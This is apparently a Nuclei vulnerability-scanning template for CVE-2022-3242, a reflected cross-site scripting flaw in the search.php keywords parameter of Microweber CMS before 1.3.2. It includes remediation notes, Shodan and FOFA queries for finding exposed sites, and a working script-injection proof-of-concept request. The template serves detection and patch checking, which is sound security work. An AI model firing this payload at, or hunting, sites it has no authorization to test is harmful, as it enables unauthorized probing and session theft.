id: CVE-2022-3242 info: name: Microweber <1.3.2 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | Code Injection in on search.php?keywords= GitHub repository microweber/microweber prior to 1.3.2. impact: | Attackers can craft malicious search URLs with JavaScript in the keywords parameter that executes when users access search results, potentially stealing session cookies, admin credentials, or performing unauthorized content modifications in Microweber CMS. remediation: | Update Microweber to version 1.3.2 or later that properly sanitizes and encodes the keywords parameter in search.php. reference: - https://huntr.dev/bounties/3e6b218a-a5a6-40d9-9f7e-5ab0c6214faf/ - https://www.tenable.com/cve/CVE-2022-3242 - https://nvd.nist.gov/vuln/detail/CVE-2022-3242 - https://github.com/microweber/microweber/commit/68f0721571653db865a5fa01c7986642c82e919c classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-3242 cwe-id: CWE-79,CWE-94 epss-score: 0.19791 epss-percentile: 0.95562 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: microweber product: microweber shodan-query: - http.favicon.hash:780351152 - http.html:"microweber" fofa-query: - body="microweber" - icon_hash=780351152 tags: cve,cve2022,huntr,xss,microweber,vuln http: - method: GET path: - "{{BaseURL}}/search.php?keywords=ABC%3Cdiv%20style=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E" matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(content_type, "text/html")' - 'contains(body, "") && contains(tolower(body), "microweber")' condition: and # digest: 4b0a0048304602210092ae8d0d2656f6056af473c9b217bf50248ed0f44316fceebef40177f0cca0db022100df4097b7a09363de5a5cb453ab30840d5d673289bc48e1ed42dcfed0f9eb5999:922c64590222798bb761d5b6d8e72950